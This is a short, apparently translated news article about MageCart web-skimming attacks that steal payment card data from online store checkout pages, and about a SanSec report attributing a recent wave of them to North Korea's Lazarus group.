Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to introduce web skimmers (malicious code) on the pages of online stores to steal bank card data. But this approach turned out to be so successful that the group soon acquired numerous imitators, and the name MageCart became a household name, and now they are designated a whole class of such attacks. And if in 2018 RiskIQ researchers identified 12 such groups, then by the end of 2019, according to IBM data, there were already about 40 of them.
During such attacks, hackers usually gain access to the server of the online store, any related resources or third-party widgets, and get the ability to download and run malicious code.
Typically, a web skimmer is downloaded only on the checkout page and automatically steals the payment card data when the user enters them at checkout. This data is sent to a remote server of attackers, and hackers collect it, use it themselves or sell it on the darknet.
Mass attacks on online stores have been ongoing since around mid-2018. Among the most significant victims of recent crackers are Wongs Jewelers, Focus Camera, Paper Source, Jit Truck Parts, CBD Armor, Microbattery, Realchems and Claire's.
A recent SanSec report connects specific domains and IP addresses used for recent MageCart attacks on US stores with the previously known hacker infrastructure of “government” hackers. So, SanSec founder Willem de Groot writes that the evidence gathered indicates that the famous North Korean hack group on Lazarus was behind a series of attacks on American stores.
“How Hidden cobra gained access (to compromised stores) is still unknown, but attackers often use phishing attacks (malicious emails) to retrieve passwords of employees from the retail industry,” the expert writes.